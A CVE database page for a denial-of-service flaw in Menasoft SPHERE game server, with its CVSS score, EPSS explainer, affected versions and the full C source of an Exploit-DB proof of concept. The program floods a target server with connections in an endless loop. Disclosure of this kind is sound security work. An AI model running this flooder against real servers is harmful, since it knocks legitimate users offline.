Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Menasoft SPHERE server 0.99x and 0.5x allows remote attackers to cause a denial of service by establishing a large number of connections to the server without providing login credentials, which prevents other users from being able to log in.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 21337
Publication date : 2002-03-08 23h00 +00:00
Author : H Zero Seven
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/4258/info
Menasoft SPHEREserver .99 is an online role playing game server. It is vulnerable to a denial of service; multiple connections to the server can be made from a single machine, exhausting available connections and denying connections to legitimate users.
/*
*
* www.h07.org
* H Zero Seven
* Unix Security Research Team
*
* Sphere Ultima Online Server - Denial of Service Vulnerability
* poc-exploit...
*
* Simple code to eat all connections from the gameserver, so other
* peoples could not connect to the server.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>
int Connect(int ip, int port)
{
int fd;
struct sockaddr_in tgt;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) return -1;
memset(&tgt,0,sizeof(struct sockaddr_in));
tgt.sin_port = htons(port);
tgt.sin_family = AF_INET;
tgt.sin_addr.s_addr = ip;
if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0)
return -1;
return fd;
}
int sprint(int fd, const char *str,...)
{
va_list args;
char buf[4096];
memset(&buf,0,sizeof(buf));
va_start(args,str);
vsnprintf(buf,sizeof(buf),str,args);
return(write(fd,buf,strlen(buf)));
}
int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in box;
fprintf(stderr, "SphereServer DoS Exploit [poc]\n");
fprintf(stderr, "H Zero Seven - Unix Security Research Team -
www.h07.org\n\n");
if (argc < 2) {
fprintf(stderr, "usage: %s <sphere ip> [sphere port]\n",argv[0]);
return;
}
fprintf(stderr,"for the full advisory regarding this vulnerability
visit www.h07.org ... \n");
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) {
perror("socket() ");
return;
}
fprintf(stderr,"Attacking sphere : ");
for (;;) {
int sock;
sock = Connect(inet_addr(argv[1]),(argc>2)?(atoi(argv[2])):3128);
if (sock<0) {
sleep(10);
continue;
}
fprintf(stderr, ".*");
}
}
Products Mentioned
Configuraton 0
Menasoft>>Sphereserver >> Version 0.99f
Menasoft>>Sphereserver >> Version 0.99i
